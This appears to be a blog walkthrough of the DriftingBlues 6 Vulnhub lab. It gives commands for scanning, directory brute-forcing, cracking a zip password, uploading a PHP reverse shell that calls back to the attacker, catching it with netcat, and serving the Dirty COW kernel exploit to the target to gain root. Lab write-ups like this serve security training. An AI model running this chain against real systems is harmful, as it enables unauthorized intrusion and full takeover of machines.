Vulnhub walkthrough : Driftingblues 6
Hello , today we are going to solve a vulnhub machine called driftingblues : 6 you can download the box from here . It is an easy vulnhub box .The credit for the lab goes to tasiyanci . Let’s get started and learn how to break it down successfully.
Import the vulnhub machine in your virtualbox or vmware and boot the machine .
Open the terminal and find out it’s ip address by typing
sudo netdiscover
here we have found our target machine’s IP address , let’s search for open ports by using nmap tool . Command :
sudo nmap -sC -sV -O -oN nmap.txt 192.168.1.22
so , from nmap scan we have found that our target machine’s operating system is linux and it has port 80 open on which http service is running . Open the browser and type the IP address in the url . We will get a page like this
It gives us message to not hack them , the image does not have any message hidden in it . I tried to look into the source code ,there is a comment at the bottom but it’s not useful , you can check that out for yourself.
As nmap scan has detected an entry in robots.txt , I went to /robots.txt and we have one disallowed entry and one interesting hint .
Clearly the author is telling us to add .zip extension while doing directory bruteforce, so let’s do it according to him , I went to the disallowed entry and there was a login window of textpatterm CMS .
We don’t have the credentials to log in so try to run gobuster to find some directories. Command:
gobuster dir -u http://192.168.1.22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .zip
we found a spammer.zip file . Let’s download it to our local system , I have download the file and it is encrypted , we don’t have password to extract the file . So I used fcrackzip tool to find the password for the spammer.zip file.Command:
fcrackzip -u -D -p /home/dark/Desktop/rockyou.txt spammer.zip
I have found the password for the file as myspace4 .After extracting I found a cred.txt file which contains credentials : mayern:lionheart , for the textpattern cms login . I logged in into the application and at the bottom of the page I found the version of the textpattern .
It was running version 4.8.3 , after searching this version in searchsploit I found this version is vulnerable to remote code execution (authenticated) Command:
searchsploit textpattern
I don’t know but for me the exploit did not work. So I manually started searching for some vulneribility and I found a file section where I can upload a file , so I uploaded the php reverse shell , you will find the php reverse shell in the /usr/share/webshells/php/php-reverse-shell.php . So I copied it to my /home/dark/Desktop/vulnhub/driftingblues6 directory . Change the script a little , type :
sudo nano php-reverse-shell.php
change the ip and port variable, in the ip variable type your attacker machine ip address , you can find it by typing :
ifconfig
Then I uploaded the php-reverse-shell in the application ,
Now , we have to run the script but to run the script we have to first find the path as to where the script has been uploaded in the application . I run a dirb scan to scan for directories in the application . Command;
dirb http://192.168.1.22/textpattern/
I found a directory /files in the application , I opened the url in our browser , and it contains our php-reverse-shell file so to get a reverse shell first run netcat on your machine by typing :
nc -lvnp 1234
here 1234 is the port number which I changed in the php-reverse-shell script .
now netcat is listening on port 1234 and now it’s time to run our script , so I opened the reverse shell file in the browser . Hurray , I got a reverse shell .
Let’s type the python one liner to make it a proper tty shell , type:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm
Now we got a proper tty shell .
PRIVILEGE ESCALATION
Now we are in the driftingblues6 machine , but we are not the root user , let’s escalate .
Let’s find out about the system , type:
uname -a
So the linux kernel version is 3.2.0 , let’s find any kernel exploit by searching it on google . We found a famous kernel exploit on exploit.db.
Let’s download the exploit to our local system . It’s time to transfer this exploit to the compromised system .
Let’s move to the /tmp directory in our compromised machine . I have started the python server in my local machine by typing :
python -m SimpleHTTPServer
Download the exploit in the compromised system by typing ;
You can learn how to compile and use this exploit by simply typing ;
cat 40839.c
To compile the exploit , type:
gcc -pthread 40839.c -o dirty -lcrypt
give executeable permission to the file by typing ;
chmod +x dirty
Now it’s time to run the dirty script , simply type:
./dirty
Now it will ask you to enter a password , type your password , you have to remeber this password .
After typing the password , the exploit will run , it will take few minutes to run after completing . Type :
su firefart
and type the password you have given earlier . AAAAnnDDD BIINGGoo , you are the user firefart which has root privileges .
Simply type ;
id
HUURRAAYY!!!!!!! we have root permission!! , now simply go to the /root folder and you will find flag.txt file in it . To view it simply type cat flag.txt
Thanks for reading this article , keep hacking keep learning :)
